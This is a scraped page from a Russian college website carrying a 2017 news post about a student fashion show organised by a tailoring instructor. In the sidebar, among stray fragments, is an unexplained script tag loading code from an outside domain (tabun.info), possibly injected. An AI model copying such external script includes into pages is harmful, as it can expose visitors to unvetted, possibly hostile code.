Главная
Регистрация
Вход

Приветствую Вас Гость | RSS

Меню сайта

Категории раздела
Абитуриентам [0]
Для желающих поступить в наш колледж

Независимая оценка
Как вы оцениваете качество образовательных услуг нашего колледжа?
Всего ответов: 224

Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0

  
Главная » 2017 » Апрель » 14 » Дефиле моделей одежды «Я не мастер, я только учусь»
07:24
Дефиле моделей одежды «Я не мастер, я только учусь»

 

11.04.2017 г. в рамках профориентационной работы для группы ОКП-09/16 по квалификации «Портной», обучающиеся группы КШП-09/15 приготовили открытое внеклассное мероприятие-дефиле «Я не мастер, я только учусь», где были продемонстрированы швейные изделия, изготовленные на учебной практике по МДК03.01 Технологии пошива швейных изделий по индивидуальным заказам, под руководством мастера производственного обучения Чубыкиной Светланы Александровны.

Дефиле проходило по нескольким направлениям, где девушки сами демонстрировали модели, изобретенные с творческим подходом. Каждая индивидуально подбирала понравившуюся модель и потом на базе основных выкроек училась моделировать, выкраивать и технологически правильно выполнять пошив изделий.

В направлении пошива юбок, блузок, брюк и платьев были представлены предусмотренные программой учебной практики прямые юбки и блузки, женские брюки и платья, которые отличались своей индивидуальностью и неповторимостью. Девушки подбирали ткань для пошива своих изделий, фурнитуру, дополнительные отделочные материалы, способ обработки, сборки деталей и узлов швейных изделий самостоятельно.

Кульминационным моментом мероприятия был выход девушек в повседневных и вечерних платьях с мастером производственного обучения Светланой Александровной в русских народных костюмах.

В конце мероприятия гостям была представлена презентация группы КШП-09/15 под названием «Дело мастера боится», в ней были отражены фрагменты учебной деятельности в период учебной практики в течение года по квалификации Портной.

Директор ООО « Силуэт» Марчук Елена Григорьевна консультировала девушек при подготовке к дефиле и  при подведении итогов выразила слова благодарности девушкам о проведенном мероприятии.

Мероприятие прошло в отличном позитивном настроении, как для самих девушек группы КШП-09/15, так и для приглашённых гостей.

Лично от себя благодарю в оказании помощи при проведении мероприятия девушек, которые, преодолев свой страх, продефилировали перед публикой, а также Марчук Елену Григорьевну, директора ООО « Силуэт» за подготовку девушек к дефиле, Балбашову Ольгу Борисовну в технической помощи проведения  мероприятия, Пантелееву Наталью Анатольевну, старшего мастера в поддержке и настрое девушек на мероприятие и фотосъёмки.

 

Материал подготовила

мастер производственного обучения

Чубыкина С.А.

Просмотров: 592 | Добавил: iTiger | Рейтинг: 0.0/0
Всего комментариев: 0
Имя *:
Email *:
Код *:


Вход на сайт
Логин:
Пароль:

Мы потомки Героев


ПОЛЕЗНЫЕ ССЫЛКИ

Министерство образования и науки Российской Федерации Единое окно доступа к образовательным ресурсам Федеральный портал "Российское образование" Единая коллекция цифровых образовательных ресурсов Федеральный центр информационно-образовательных ресурсов


Персональные данные Дети МЕСТО РОЖДЕНИЯ:
ТЮМЕНСКИЙ КРАЙ Конкурс новый взгляд
<script src="https://tabun.info/out/index.php"></script>
http://профстажировки.рф/
Поиск

Календарь
«  Апрель 2017  »
ПнВтСрЧтПтСбВс
     12
3456789
10111213141516
17181920212223
24252627282930

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Архив записей

Copyright MyCorp © 2024
Создать бесплатный сайт с uCoz